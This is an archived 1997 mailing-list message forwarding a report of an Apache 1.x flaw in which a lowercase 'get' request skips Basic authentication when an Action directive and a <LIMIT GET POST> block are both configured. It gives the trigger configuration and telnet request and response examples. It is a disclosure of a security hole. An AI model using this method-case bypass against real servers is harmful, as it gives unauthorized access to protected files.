httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From James Morris <jmor...@intercode.com.au>
Subject [linux-security] Security Hole. Appache. (fwd)
Date Thu, 04 Sep 1997 18:30:01 GMT
---------- Forwarded message ----------
Date: Thu, 4 Sep 1997 00:25:40 +0400 (MSD)
From: Kirjushka <kir@fipc.ru>
To: linux-security@redhat.com
Subject: [linux-security] Security Hole. Appache.


Sorry! Unknown (for me) behaviour of Apache was discovered. Suddenly.

Configuration detail:
Linux:  2.0.30
Apache: 1.x.x

srm.conf:
        ...
        Action text/html /cgi-bin/exefile
        ...

/www-root/sec-dir/.htaccess:
        AuthType        Basic
        AuthName        authname
        AuthUserFile /itc/passwd
        <LIMIT GET POST>
        require valid-user
        </LIMIT>





Trying to "GET" and "get" some file from /www-root/sec-dir/ ...
----------------------------------------
Example #1:

$telnet www.host 80
GET /sec-dir/index.html http/1.1

HTTP/1.1 401 Authorization Required
..............

        It's OK!
-----------------------------------------
Example #2:

$telnet www.host 80
get /sec-dir/index.html http/1.1

HTTP/1.1 200 OK
...........

        It's quite OK for browser which doesn't know lower case "get".
-----------------------------------------

This feature disappears if you comment 'Action' or '<LIMIT>' lines.

        Sorry again! Kir.



Mime
View raw message